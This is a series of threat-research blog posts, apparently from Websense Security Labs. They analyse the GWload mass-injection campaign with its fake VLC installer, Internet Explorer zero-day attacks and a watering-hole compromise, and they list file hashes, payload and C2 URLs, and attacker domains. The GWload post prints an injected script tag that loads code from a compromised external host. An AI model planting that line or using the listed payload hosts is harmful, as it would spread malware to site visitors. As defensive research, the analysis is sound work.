Elad Sharf

Websense® Security Labs™ ThreatSeeker® Intelligence Cloud has identified that a new mass injection campaign is making its rounds, compromising and injecting content into tens of thousands of legitimate websites. This campaign is an evolution and expansion of an existing injection campaign that Websense® Security Labs™ has been monitoring since January of this year. Our telemetry shows that, to date, at least 40,000 compromised pages have occurred on the Web, redirecting and tricking users to install rogue software.

We see parallels of the injected websites with websites that were affected by the “cookiebomb” mass injection, which was mostly associated with delivering “ransomware” payloads.  (Our blog on CookieBomb attack is here).  Let’s get back to GWload…

 

We’ve made three key observations about this campaign. The first is the use of a social engineering technique to lure users into downloading malicious and undesirable content.  Although most website injections in the wild redirect to exploit websites, this dominant campaign seems to shift the focus to using a social engineering technique, rather than exploits, to get unwanted content installed on victims’ machines. Our second observation is that the time of emergence of this campaign coincides with the arrest of the Blackhole Exploit Kit author ‘Paunch,’ which could explain the change in mass injection tactics, as actors move from serving exploits to social engineering. This shows that the cyber underground may have contingency plans in place to adapt and react quickly to change. Our third key observation is that the campaign employs an ‘end to end’ infrastructure of legitimate websites. These legitimate websites become compromised so that they ultimately serve rogue content. The cyber criminals deploy code to defeat ad-blockers and code that ‘locks content’ and access to the website until a certain action is complete (a technique that in the past has been used with Cost per Action CPA lead-based scams on the Facebook platform. To be clear, conducting CPAlead campaigns is not illegal; however, using CPAlead advertising methods that deceive users is illegal. The ultimate aim of the lure is to install rogue software that compensates the actors through an affiliation program. In this blog we’re going to cover the different aspects of this mass injection campaign and share relevant telemetry. 

 

Executive Summary 

 

• Thousands of legitimate web pages are compromised in a mass injection campaign we dubbed ‘GWload’ and detected as early as the week of the 14th of October.
• The campaign employs a social engineering technique to lure users into downloading rogue content.  Most mass injections found in the wild typically redirect to exploit websites; employing a social engineering technique instead of exploits seems to be a shift in focus to push software installations, adware, and spyware without the user’s consent.
• The expansion and emergence of this campaign that employs social engineering techniques also coincides with the arrest of the Blackhole Exploit Kit creator ‘Paunch,’ which could explain the change in tactics of different cyber-crime actors with their mass injections, as they move from serving exploits to social engineering. This suggests that actors in the cyber underground may have contingency plans in place to adapt and react quickly to change.
• The campaign employs an ‘end to end’ infrastructure comprised of legitimate websites under the control of cyber criminals. It was observed that injected code doesn’t lead to specially crafted payload websites but to other legitimate websites that became compromised and then are used as the serving points for rogue software installations. This effectively allows rogue content to be harder to detect and defeats detection systems that rely only on reputation.
• Actors behind this campaign employ a set of open source tools to defeat ad-blocking technologies. The actors aim to monetize successful rogue installations through affiliate programs. The main payload script of the lure uses ‘content locking’ tactics that are very common with Cost Per Action (CPA) scams that propagate on Facebook, and the code used in this specific case shows a copyright notice from Adscend Media LLC, which is a company that was sued by Facebook for engaging in scams and fraudulent activity on the Facebook platform.

 

Distinct geographical locations of compromised web-servers:

 

Number of injected web pages spotted in the last 7 days:

 

The Lure 

 

Users who browse to a compromised injected website are immediately redirected ‘drive-by’ style to a second compromised website that (a) effectively blocks all content of the legitimate website and (b) shows them this notification: “VLC player is required for this website, click DOWNLOAD NOW”. VLC media player is a legitimate open source media player (the official page is located here). However, VLC player is also known to be abused and bundled with some non-legitimate software, and this is the case with all the “VLC media player” installations that take part in this mass injection campaign; they’re all “complemented” with a generous number of unexpected rogue installations of additional software.

 

The lure – how content is ‘locked’ with conditional access; this is what the user sees when browsing to an injected website (click to enlarge):

 

A website’s main page source code, injected with ‘GWload’ (click to enlarge):

 

A website’s Javascript file source code, injected with ‘GWload’ code alongside a ‘Cookiebomb’ injection (click to enlarge):

 

Infection & how money is made

If a user is convinced that it is necessary to download and run the file to access the website’s content, then unexpected, rogue installations of software will commence on the user’s machine. These software installations allow the actors behind this campaign to monetize infections. ‘Monetizing’ is the keyword here, because the binaries that are downloaded come from the infrastructure of a company called ‘Amonetize LTD‘ – a company with a speciality in ‘pay per install’ schemes. Basically the company compensates participants of its ‘pay per install’ programs with money. Here is the definition from the website’s FAQ section, to help make things clearer:

 

What is Amonetize? (Click to enlarge):

 

A user who runs the binary will immediately see an installation dialog box of ‘VLC player’ (see Image 1 below). So far so good: it has the ‘VLC Player’ logo. But it also has some information written in small letters that the browsing user should probably read. The small letters suggest what’s coming, but most users at this stage are eager to get access to the website (or it could be that their curiosity plays a part), and they click ‘Next’ to advance the installation of what they think is the video player. At this stage the open source package of ‘VLC player’ is downloaded from the official website, but it’s not getting installed.  The next stage asks the user to install ‘Registry Helper’ (Image 2).  There’s a decline button, and choosing to decline helps in that the app doesn’t get installed. But clicking the ‘Next’ button brings a flood of bad news (Image 3), because from that stage on, a lot of software is getting installed on the user’s machine silently, in different locations. The initial binaries that get downloaded, run, and installed are “updater.exe” files downloaded from hxxp://cdn3.anotherdownload.com/updater/Updater.exe and “sctmp.exe” from  http://downloadspot7.shoppingchip.info/sctmp.exe.

 

 

Image 1 – Looks like “VLC Player” Installation, but the small print allows for some extras:

 

Image 2 – “Registry Helper” opt-in: 

 

 

Here is a summary of all files\applications taking part in the Cost Per Action (CPA) scheme that get installed and run on the machine:

 

SHA1: bce71547dec74a39cca484a3b5a2ec9c844c4575 , filename: sctmp.exe (ShoppingChip)

SHA1: d52e3715b0d1f4a43e9aff2347e6b1fc88a3b7e8 , filename: 294823_.exe (ShoppingChip)

SHA1: 2315be5c129efe4fac36850b225ca2ebeec196ae , filename: 0j.exe (ShoppingChip)

SHA1: 0b9e805077320b0ce1e6620488bd34f1c4d7827e , filename: w.dll (ShoppingChip)

SHA1: 184c60aafbb12d1023b1ce2aff4d3708607a75a1 , filename: W.x64.dll (ShoppingChip)

SHA1: 668437f834b3f4e1e2b6383936528d56c17ca3eb , filename: Updater.exe (Amonetize)

SHA1: 44541bd12d0c1454310babb38ef65579544bb7cb , filename: bundlesweetimsetup.exe (SweetIM\SweetPacks)

SHA1: c077be880adcca469cb8009f9a3f4170497fa011 , filename: spacksyahoo_717_active.exe (SweetIM\SweetPacks)

SHA1: 827ab81eb687b4fe88ac500d6dae475ba7dd2daf , filename: ExtensionUpdaterService.exe (SweetIM\SweetPacks)

SHA1: 3e1726b904874101c93b51c784917f2aedd3863c , filename: Extension32.dll (SweetIM\SweetPacks)

SHA1: ac57ebd667acf5734d3fe5c7f1982440b507bcff , filename: installerhelper.dll (SweetIM\SweetPacks)

SHA1: 2eabe4f755213666dbbbde024a5235ddde02b47f , filename: registry.dll (SweetIM\SweetPacks)

SHA1: 6c4c7be6be33413be0017bb31a78921f61b6cd3b , filenmae: sweetiesetup.exe (SweetIM\SweetPacks)

SHA1: b9fb23cbe82811b97e6c3ad0dac182b8f99c9e9d , filename: 1382915777_45645062_228_4.tmp (SweetIM\SweetPacks)

SHA1: e1606da015762918176602bf3dd696b88351535b , filename: WSSetup.exe (SweetIM\SweetPacks)

SHA1: 63ec07e905abf4f8bbf85b0b721820e4533cd81e , filename: SetXPDriverSigningPolicy.exe (SweetIM\SweetPacks)

SHA!: a7c1b35254f2c1fc56648823b59fbba6577aa4e7 , filename: Coupon_Scout_102.exe (CouponScout)

SHA1: 8c13adefc4a1726a1f12f986c7f7b77375b8a6e2 , filename: psupport.dll (Bprotector)

SHA1: 7efc16c587164083105dd52683ca453f9a64fb17 , filename: cs-browser-assistant-2-0.exe (CS Browser Assistant) 

SHA1: 2ec3760fd906e8dfe827cdbf552b8786348b1121 , filename: Wwyqza.exe (CS Browser Assistant) 

SHA1: 868bc131566a670d9a27742f1f499f2e36107a33 , filename: 44286.crx (CS Browser Assistant) 

SHA1: ee311464e5cee2ea7be63a09a7bd8aaa470243aa , filename: 44286.xpi (CS Browser Assistant) 

SHA1: 9efbf2f1d28936e18b2a17cb853e8623f192e292 , filename: CS Browser Assistant 2.0-bho.dll (CS Browser Assistant) 

 

Here are the Registry modifications that suggest Browser Helper Objects, services, and toolbars: 

 

URLSearchHook: SweetIM ToolbarURLSearchHook Class – {EEE6C35D-6118-11DC-9C72-001320C79847} – C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgHelper.dll

 

BHO: CrossriderApp0044286 – {11111111-1111-1111-1111-110411421186} – C:\Program Files\CS Browser Assistant 2.0\CS Browser Assistant 2.0-bho.dll

 

BHO: Updater By Sweetpacks Helper – {DEDAF650-12B8-48f5-A843-BBA100716106} – C:\Program Files\Updater By Sweetpacks\Extension32.dll

 

BHO: ShoppingChip – {EBFD7D4B-EF00-3F7D-A2C7-4C6C23DCAFAC} – C:\Program Files\ShoppingChip\W.dll

 

BHO: SWEETIE – {EEE6C35C-6118-11DC-9C72-001320C79847} – C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll

 

Toolbar: SweetPacks Toolbar for Internet Explorer – {EEE6C35B-6118-11DC-9C72-001320C79847} – C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll

 

Service: Updater By Sweetpacks – Unknown owner – C:\Program Files\Updater By Sweetpacks\ExtensionUpdaterService.exe

 

 

To summarize this section, a significant amount of unexpected and unwanted software may have found its way to the user’s machine, including: ShoppingChip, SweetIM\SweetPacks, Amonetize Updater, CouponScout, Bprotector & CS Browser Assistant.  We hope there won’t be more.

 

 

How the lure code operates, and relationship to rogue CPAlead campaigns on Facebook

 

The script that is loaded by an injected website with ‘GWload’ also resides on an injected website and follows a two-stage process (related source code is demonstrated in the images below). The first stage is the ‘locker page loader’ where steps are taken to prepare the browser to load the ‘content locker page’.  Among its various actions, it prepares the frame where the ‘content locker page’ is going to reside and sets a cookie on the user’s machine. At this stage, the script won’t redirect to the ‘content locker page’ and lock the website’s content if there was no referrer set to the request.  This means that the ‘content locker page’ will show and activate only if the user was referred from another website, such as a search engine result. If everything checks out at the first stage, then the ‘content locker page’ is loaded, and it blocks the website’s legitimate content from the user, permitting access only if ‘VLC Media Player’ is downloaded and installed. Digging a bit deeper and looking for references in the code section ‘gwloaded = false‘ over the web shows that it’s associated with tools that aim to evade browser-based “Ad blockers” software. In fact, the comments at the start of the script claim in plain sight that the script and its contents are the intellectual property of Adscend Media LLC. Adscend Media LLC is a company that was sued by Facebook; Facebook claimed that the company engaged in scam and fraudulent activity on the Facebook platform. A lot of the scams on Facebook employ social engineering tricks similar to this mass injection: they typically condition access to content if certain steps are executed by the user; conditions vary and may include filling out a survey or installing software. This model of on-line advertising is called “Cost Per Action” (CPA) or “Pay Per Action” (PPA), where the advertiser pays for each specified action commenced by the user.

 

Once the ‘content locker page’ loads, it prompts the user to download the software with several links leading to the same location at trackergeo.com. This domain acts as a statistics collector; checking the Whois data for that website shows that it was registered by a zhang jing and with email address derqe43@qq.com; commencing a reverse Whois lookup on the email address reveals more domains that have a low reputation and that were registered ~14-20 days ago:

 

fulllocalbabez.com

nicelocalbabez.com

shishang558.com

malelocalbabez.com

teng8teng8.com

ownlocalbabez.com

gxtopit.com

lowlocalbabez.com

okaylocalbabez.com

xjjiaoy.com

nulllocalbabez.com

wiselocalbabez.com

lizhengqu.com

xjyinxiao88.com

 

 

trackergeo.com redirects to hxxp://www.winmediaplayer.com/direct-download.html?version=1.1.8.21&iaff1=10084&ci=3793&capp=MediaPlayer, which further redirects to download the installation file at hxxp://www.askdownload.com/download.php?version=1.1.8.21&prefix=VLCMediaPlayer&campid=3793&capp=MediaPlayer&iaff1=10084.

 

The file downloaded named VLCMediaPlayer__3793_il256.exe (SHA1: 7e8593c36209afa8f065ac00aa3d3b40b738dc00) is the main file that starts the process of installing unwanted software, as we described in the previous section. A summary report from Websense’ sandbox ThreatScope™ show that the file tries to connect and download suspicious content from the web address idyllicdownload.com/index.php, a website registered by Amonetize LTD.

 

winmediaplayer.com and askdownload.com are registered by Amonetize LTD. You can notice the affiliate ID marked in bold above: 10084, this number is how Amonetize can track and associate downloads to affiliates and compensate them accordingly. If we do a reverse Whois lookup on recent domains that are owned by Amonetize LTD we spot some interesting matches:

 

invitedownload.com

offerswizard.com

paidtoinstall.com

existentdownload.com

offerswizard.net

winmediashare.com

ezitenom.com

varietydownload.com

accuratedownload.com

bestflashplayer.net

amonetize-reports.com

winflashdownload.org

smashflashplayer.org

offerswizard.org

bestflashplayer.org

winpdfcreator.com

wintvapp.com

bestflashplayer.com

amonstat.com

mindownload.com

keenondownload.com

fixeddownload.com

amusingdownload.com

alwaysdownload.com

usualdownload.com

unusualdownload.com

winflashdownload.info

winapptv.com

preferdownload.com

promptdownload.com

hottestdownload.com

3rddownload.com

naturaldownload.com

realmdownload.com

idyllicdownload.com

wishdownload.com

validdownload.com

okaydownload.com

stylishdownload.com

smashflashplayer.info

winflashplayer.com

winflashdownload.net

anotherdownload.com

winnerdownload.com

properdownload.com

beyonddownload.com

insidedownload.com

visiondownload.com

vitaldownload.com

downloadokay.com

winflashplayer.net

smashflashplayer.net

winpdfreader.com

statedownload.com

soledownload.com

smashflashplayer.com

worthdownload.com

immensedownload.com

intactdownload.com

chicdownload.com

honestdownload.com

downloadfixed.com

downloadwish.com

sensedownload.com

gethdplugin.com

winvlc.com

win7zip.com

intodownload.com

optdownload.com

downloadalways.com

brainydownload.com

thisisdownload.com

justlydownload.com

2nddownload.com

commondownload.com

steerdownload.com

winflashdownload.com

compress-it.com

 

The first stage – the ‘locker page loader’:

 

 

The second stage – the ‘locker page’:

 

 

 

Telemetry 

 

Our telemetry shows that different and diverse sets of websites are affected by this attack.  Below is a chart that shows the top 20 categories of websites that have been injected with ‘GWload”.  Leading the chart are websites that fall under the ‘Business and Economy’ category, followed by ‘Sex’ websites, ‘Web hosting’ websites, and ‘Information Technology’ websites. Closing the top five of injected websites is the ‘Travel’ websites category.

 

Top 20 categories of websites injected with ‘GWload’ (click to enlarge): 

 

 

Top Ten Injected Countries:

 

 

Detection

 

An injected website can be identified by looking for the next two keywords in the page’s source code:

1. >var gwloaded = false;< 

2. .php” type=”text/javascript”></script>

 

Injected code example:

<script type=”text/javascript”>var gwloaded = false;</script>

<script src=”http://brandway.home.pl/blekitna_pl/mDJkxzca.php” type=”text/javascript”></script>

 

ThreatSeeker detecting the insertion of malicious code to legitimate website (click to enlarge):

 

 

Summary

 

In this blog we described a mass injection campaign that emerged in the past two weeks and that continues to affect thousands of websites across the globe. We noticed that this mass injection uses a social engineering trick that locks legitimate websites’ content to lure potential victims to install applications that participate in Cost Per Action (CPA) advertising schemes. This change in tactics that occurred in the past two weeks coincides with the arrest of the Blackhole Exploit Kit author ‘Paunch,’ which could suggest that actors adapt to change rapidly to keep their attack going. It was also apparent that certain scripts used by actors to serve social engineering-based attack vectors are interchangeable across different attack platforms; we witnessed with ‘GWload’ that code that mostly was used in social engineering-based attacks on Facebook has now migrated and is used with mass injections.

 

Websense customers are protected from injected websites and the different stages of this threat with our Advanced Classification Engine – ACE.

Websense® Security Labs™ has seen a new zero-day exploit for Internet Explorer (CVE-2013-3897) used in highly targeted, low-volume attacks in Korea, Hong Kong, and the United States, as early as September 18th, 2013. The publication of the vulnerability details (CVE-2013-3897) were shared by Microsoft in advance of today’s patch for the vulnerability that is now available for download. Websense ThreatSeeker® Intelligence Cloud was able to correlate those attacks and create a profile about targeted geographical locations where attacks began as well as targeted industries, which will be described later in this post. In addition, we found the targeted attacks that utilized the exploit for CVE-2013-3897 also included older exploits in their attacks like CVE-2012-4792 for certain targets.

 

Executive Summary

• Websense ThreatSeeker Intelligence Cloud has seen a new zero-day exploit for Internet Explorer (CVE-2013-3897) used in highly targeted, low-volume attacks in Korea, Hong Kong, and the United States, as early as September 18th, 2013. 
• Websense
  telemetry indicates that the attack campaign using the same infrastructure
  and the exploit (CVE-2012-4792) began as early as August 23rd 2013 before
  transitioning to CVE-2013-3897 in mid-September
• A patch has been supplied by Microsoft and is available for download.
• Microsoft took this opportunity to patch a previous vulnerability for Internet Explorer CVE-2013-3893. The patch for both vulnerabilities can be found at this link: ms13-080.
• Our ThreatSeeker Intelligence Cloud reported that the attacks targeted primarily financial and heavy industries in Japan and Korea.
• Our telemetry shows that the actors behind these attacks used their infrastructure to launch older exploits for Internet Explorer, such as CVE-2012-4792, which was first seen at the start of 2013.
• Websense has protected our customers from the recent Microsoft Internet Explorer CVE-2013-3897 and CVE-2013-3893 exploits observed in the wild by using real-time analytics that have been in place for nearly three years.

 

Vulnerability Details for CVE-2013-3897

 

The vulnerability is caused by a “use-after-free” error when processing “CDisplayPointer” objects within mshtml.dll and generically triggered by the “onpropertychange” event handler; the vulnerability could be exploited remotely by attackers to compromise a system via a malicious web page. The specific exploit that has been seen uses heap-spray to allocate some memory that employs an ROP technique around the 0x14141414 address (as confirmed by the Microsoft Security Response Center).

 

A sample of one of the specific exploit pages that has been spotted in the wild shows Javascript code that appears to target Microsoft Windows XP 32-bit with these languages: Japanese or Korean and Internet Explorer 8.

 

 

The attacks were served by directly browsing to raw IP addresses and were spotted served by selected IP addresses in the network range of 1.234.31.x/24, which is geolocated in the Republic of Korea. The attack lure pages (starting point of the exploit chain) on that network range share the same URL patterns and they all consist of the URL structure <x.x.x.x>/mii/guy2.html.

 

We also spotted that a URL with that same structure on the same network range was used to serve an older and disclosed exploit for Internet Explorer CVE-2012-4792 also in a low-volume and targeted way. Those attacks were launched at the end of August this year. Here is a snippet of the page located at hxxp://1.234.31.142/mii/guy2.html. In the case of CVE-2012-4792 in this campaign, it looks like there were no conditional checks for the operating system, browser, and language prior to serving the exploit, which means it was served to the target unconditionally.

 

 

 

 

Telemetry

 

Looking at the broader picture and taking into account all the related attacks that we’ve seen served from the IP range 1.234.31.x/24, we found some interesting information that can shed more light on the high-level agenda held by the perpetrators in this campaign. The next pie chart shows the different industries that we saw being targeted with this campaign in the last month. The chart reveals that the interest of the perpetrators in this case is broad as they aim to compromise different type of industries that aren’t necessarily related to each other:

 

 

Another interesting find is that this attack campaign is global; although, as described earlier, attack pages check whether the operating system’s language is either Japanese or Korean before issuing the CVE-2013-3897 exploit. It looks like the geolocation of targeted entities of Korean or Japanese origin are not just limited and based in those countries. For example, one entity that belongs to the Engineering and Construction industry has been targeted in the U.S. as one of its locations. In addition, as mentioned before, those who use CVE-2012-4792 didn’t employ any conditional checks before issuing the exploit, so that meant the potential targets in that case could be more varied. Indeed, we found that with this campaign, a government entity located in the U.S. was targeted with CVE-2012-4792.The next pie chart shows the popularity of the different targeted geographical locations of this campaign:

 

 

 

 

Exploit Locations vs. Targets

Websense telemetry indicates that the CVE-2013-3897 exploit has been hosted on servers in Seoul, South Korea at IP addresses 1.234.31.153, 1.234.31.142 and 1.234.31.154. We have seen this exploit targeting computers located in the United States, Hong Kong, and Seoul, South Korea.

 

Summary

 

In this blog, we’ve taken a look at a targeted attack campaign that has been in circulation for the past month. It appears that the perpetrators behind this campaign target entities that belong to different industries over a selected set of geolocations, which reaffirms the notion that these kinds of campaigns operate on a global scale and focus on a variety of industries that are not necessarily related. The perpetrators behind these campaigns are innovative and employ zero-day exploit code, but it also appears that their work is customized for their targets since we witnessed older exploits that have already been patched being used in selected attacks.

 

Update 10/10/2013 – Websense Researchers have confirmed that the attacks seen from this threat actor beginning August 23rd, 2013 were utilizing the CVE-2012-4792 exploit. The first observed use of CVE-2013-3897 as part of this campaign was on September 18th, 2013.

 

Websense® Security Labs™ and The Websense ThreatSeeker® Network have detected that the government-related websites ict.org.il and herzliyaconference.org have been involved in a “waterhole” attack and are injected with malicious code that serves as an exploit for Internet Explorer vulnerability CVE-2012-4969. The first website describes itself as the “International Institute for Counter-Terrorism”. Both websites seem to be connected and governed by a leading Israeli academic institution called the IDC. 

 

The malicious code found on the websites is identical and was identified as CVE-2012-4969 – an Internet Explorer vulnerability that was verified as a zero-day at the time and was found to be exploited in the wild on September 2012. It was found by Eric Romang from Zataz.

 

From our initial checks, the websites still serve the malicious code on specific paths, and have been serving the malicious code from as early as the 23rd of January 2013. At the time of this writing, the malicious code on ict.org.il appears to be fully functional, but the malicious code on herzliyaconference.org doesn’t seem to be functional (the main page that initiates the exploit seems to have been removed; although subsequent pages are still available, on their own they won’t serve a successful exploit).

 

The attack seems to be very similar to the spear-phishing attacks we reported on with the “Rotary Domains” (Part 1 & 2) that served CVE-2012-4792 – that’s the same zero-day that was found on cfr.org. The attack on IDC uses a Flash file to conduct a “heap spray” attack. The Flash file appears to have the misspelled string “heapspary”.  According to Symantec, this string may be evidence that the “Elderwoord” group is behind this attack, because there’s a similarity to the cfr.org attack, which held the same string “heapspary” in a Flash file as well. We’re not completely convinced by this theory; this may indeed suggest a connection to the “Elderwoord” project, but may instead suggest the use of the same toolkit by different perpetrators. 

 

One of the most interesting techniques employed by this attack, which we described in detail in our previous “Rotary Domains” posts, is that the dropped malware is actually embedded as a XORed list of bytes on the page and assigned to a Javascript variable with a marker at the start of the stream.  After exploitation is successful, then on the client side the shellcode initiates a thorough search for a certain marker in memory called “KKONG”.  When this marker is found, then the stream is extracted and de-XORed to form the actual malware binary, which is then run. This is an interesting technique that is also good for Sandbox evasion and reminds us of the “Drive by cache” techniques also found to be popular with spear-phishing attacks in the last two years. The difference in this method is that it’s sort of a “Drive by marked memory object”.

 

Websense Security Labs™ has contacted the IDC to report the compromise; as of this writing we had not heard back yet from the IDC.

 

The Israeli website for the “International Institute for Counter-Terrorism” and its mission statement is shown here:

 

 

 

 

 

Technical details

 

As described, the attacks on both websites are identical. The exploit chain starting point is in an HTML file on a dedicated directory.  We’re not certain if this specific path was sent in spear-phishing emails, or if the main page of each of the websites referred to this path. If you have any more details on this, please do let us know.

 

Here are the exploit chains for ict.org.il and herzliyaconference.org:

hxxp://www.ict.org.il/js/1.html -> Flash file loader (AceInsight report)

hxxp://www.ict.org.il/js/logo4969.swf -> Flash heap-spray + exploit.html loader

hxxp://www.ict.org.il/js/exploit.html -> Dropped file cache + Exploit Loader

hxxp://www.ict.org.il/js/Protect.html -> Exploit CVE-2012-4969

 

 

hxxp://www.herzliyaconference. org/_modules/80.html -> Flash file loader (AceInsight report)

hxxp://herzliyaconference .org/_modules/logo4969.swf -> Flash heap-spray + exploit.html loader

hxxp://herzliyaconference. org/_modules/exploit.html -> Dropped file cache + Exploit Loader

hxxp://herzliyaconference. org/_modules/Protect.html -> Exploit CVE-2012-4969

 

Let’s have a look at the specific exploit chain on ict.org.il.   The file 1.html is used just as a loader for the malicious file logo4969.swf.  Besides the loading of the malicious file, there are no malicious indicators on the page, but just the HTML Flash container/loader:

 

 

The loaded Flash file initiates a heap-spray attack, but it also acts as the caller to the Exploit Loader page exploit.html – it loads it through some Actionscript commands embedded in the Flash file, to evaluate some Javascript code to be executed on the page and load exploit.html, as seen in the next picture snippet from the file: 

 

 

 

exploit.html holds some Javascript code and an especially long variable. This variable starts with a marker “KKONG” that is later searched for by the shellcode that resides inside the loaded Flash file on the client side. The file is obfuscated with a simple XOR 0xBF. The page also loads the actual exploit page by calling an iframe to Protect.html:

 

 

 

Protect.html holds the exploit code to CVE-2012-4969. The exploit code is obfuscated with a simple obfuscation technique: 

 

 

 

After the exploit is triggered by Protect.html, the code will jump to the sprayed shellcode on the heap.  In return, the shellcode will scan the memory for the marker mentioned earlier: “KKONG”. After the marker is found, the shellcode strips the stream following the marker and gets it de-XORed with the value 0XBF to form a valid executable file.  That file is then written to the Windows local machine’s temporary folder and executed to infect the machine with a persistent backdoor.

 

 

 

The executed file dw20.exe (MD5:d2354e9ce69985c1f55dbad2837099b8) acts as a dropper and has the same name as the file dropped with Rotary domains attack. The threat stays persistent on the system by dropping another file to the Windows directory called startup.dll (MD5: 4e1e2b9cd6b5bca2b1b935ddc97f2d7a) that registers as an auto-started service called WindowsUpdata. Check out this complete report from ThreatScope™. The backdoor service is actually installed under a registry key called “RAT”, which is not very discreet, to say the least, and the backdoor connects to a C2 that is recognized by our service as suspicious hxxp://interfacet.oicp.net:88. It appears that oicp.net is a web host that is located in China. Custom hosts on the site have been found to be involved in targeted attacks in the past (1 2); however, the specific host actually points to an IP address of 65.19.141.203 located in Fremont, California, United States. Looking closer at this IP address, we could see that it hosts a lot of mayhem, as well as many other hosts that are associated that use host names on *.oicp.net that we have already classified in a security category:

 

 

 

 

 

One of the most interesting parts is that the IP address to which the C2 points is hosted on an IP address range that belong to Hurricane Electric, a US-based internet service provider that got some headlines lately for being the first Internet Backbone to Connect to 2,000 IPv6 Networks. An Interesting article from ‘The Droid Tech Guy’ illustrates how, although web traffic in China is very restrictive and censored, its architecture is actually one of the most advanced.  According to the article, one of its advances is that it employs a security feature known as Source Address Validation Architecture (SAVA). To quote from the article: “This feature puts security checkpoints throughout the system and then builds up a database very systematically. This database will contain trusted computers and their IP addresses. This system will then authenticate who is sending what. This way, the possibility of sending malicious data becomes a lot more difficult, nearly impossible, like many say.” 

 

This is a good point that makes us ponder – could it be that threats that originate from China are actually safer, from the attacker’s perspective, if hosted outside of China? That may well be the case. 

 

In summary, we had a look at high profile government related website that got compromised in a ‘waterhole’ attack and employed some interesting technique. It looks as if targeted attacks have now been surfacing regularly and more frequently, with more attacks that are now exposed almost on a weekly basis. Those kinds of rapid discoveries may cause the players behind state-sponsored attacks or other miscreant groups to increase their level of sophistication. However, we believe that the sophistication of such attacks directly depends on the protection level employed by the target. If defense levels are mediocre or “just enough,” then attackers will probably do just that much to get past them. The tough questions one should ask one’s self in today’s threat landscape is “what am I doing to not be the next victim?” and, even more importantly, “what am I going to do when I do become one?”.  We believe that post-infection mitigation plans should be given the same emphasis as prevention and putting adequate protection in place.

 

Websense Protection

 

Websense customers are protected from this and other threats by Websense ACE (Advanced Classification Engine).  ACE protected against this threat in real-time and against the different stages of the attack progression, also known as the “kill chain”. You can find in the next link more information about the 7 stages of advanced threats. Here is a recap how ACE protected against the different stages:

 

Lure stage: protection confirmed, the lure is the first stage of the attack and in this case it was those URLs that loaded a malicious flash file:

hxxp://www.ict.org.il/js/1.html -> Flash file loader (AceInsight report)

hxxp://www.herzliyaconference.org/_modules/80.html -> Flash file loader (AceInsight report)

 

Dropper stage: not applicable, the dropper is the stage where a file passes through the gateway and inspected in real-time, however, this is not applicable for this attack as the file was hidden and obfuscated in memory and reconstructed on the client side – this is a typical sandbox evasion technique. 

 

Calling home stage: protection confirmed, the calling home stage is the destination that the malware connects to after getting successfully installed on the victim’s machine. In this attack the malware initiated connection to a destination that is already known to us hxxp://interfacet.oicp.net:88 (AceInsight report).

 

 

For participation in data analysis, special thanks to: Gianluca Giuliani

Hot on the heels of the NBC.com hack last week, Websense® Security Labs™ researchers were alerted by SANS to another high profile website compromise on Friday: bible.org. It appears that the offending code has now been removed from the bible.org website.  

 

At first glance, this seemed to be a run-of-the-mill “compromise, redirect, exploit” chain; however, closer analysis revealed the use of an interesting Honeyclient evasion technique. Honeyclients allow the profiling of websites in a heuristic and automated way; more often, testing a website with a Honeyclient takes longer than signature-based solutions but the results are much more accurate, especially when new zero-day code or a new emerging threat needs to be flagged up and requires scrutiny. Usually, Honeyclients run on top of virtual machine sandboxes: evasion techniques allow malicious code to become more aware of its running environment and to check if it’s in a virtual environment or likely to be an ‘analysis’ environment before actually running malicious code. 

 

 

 

This snippet of code is the entirety of the Honeyclient evasion attempt – as the method name suggests, the function ‘jsstatic’ will only be called once the eventhandler registers the movement of the user’s mouse over the document (page) – obviously, a primitive Honeyclient will have no mouse movement emulation, therefore the offending function that leads to exploit code will never be called and alerted on by the Honeyclient.

 

Let’s take a closer look at the jsstatic function (click to enlarge):

 

 

The first part of this function definition is simply a sentry variable, to stop the function being executed indefinitely with each new onmousemove event – the global variable astatf is defined as 0 in an earlier part of the script. The next part simply creates the iFrame, which is then executed as if it had just been injected into the page, as per a normal compromise.

 

This technique is quite primitive and showcases the infancy of this type of Honeyclient evasion technique. The plethora of event handling methods available means this technique is not going to go away anytime soon, and is likely only going to get more complex and inventive. 

 

In summary: the use of such techniques ultimately aids malicious code in remaining undetected for longer periods of time and thus increases its chances of bypassing security products undetected. The technique described in this blog is simple and allows redirection to exploits only if a mouse movement is detected, an action that is often associated with an actual person interacting with a website and often not used by primitive Honeyclients. Why are the attackers using this technique instead of the normal drive-by type technique we usually see? probably because they wanted to make the attack more stealthy, as attacks like this wouldn’t be picked up by automated behavioral analysis systems. That’s why multiple layers of defense are needed for web-based attacks.

 

This discovery ties in to Websense Security Labs predictions that Cybercriminals will become more ‘virtually aware’ and find modern bypass methods to avoid security detection – see our Websense 2013  Security Predictions.

 

Author: Darrel Rendell